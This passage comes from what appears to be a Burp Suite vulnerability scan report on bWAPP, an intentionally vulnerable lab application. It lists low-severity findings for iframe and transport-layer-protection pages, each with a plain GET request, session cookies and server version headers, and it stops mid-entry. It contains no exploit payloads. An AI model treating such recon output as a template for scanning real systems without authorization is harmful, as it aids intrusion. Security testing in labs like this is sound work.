    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13438

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.78. http://192.168.52.147/bWAPP/insecure_iframe.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_iframe.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insecure_iframe.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12751

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.79. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_transp_layer_protect_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/insuff_transp_layer_protect_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13263

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.80. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_t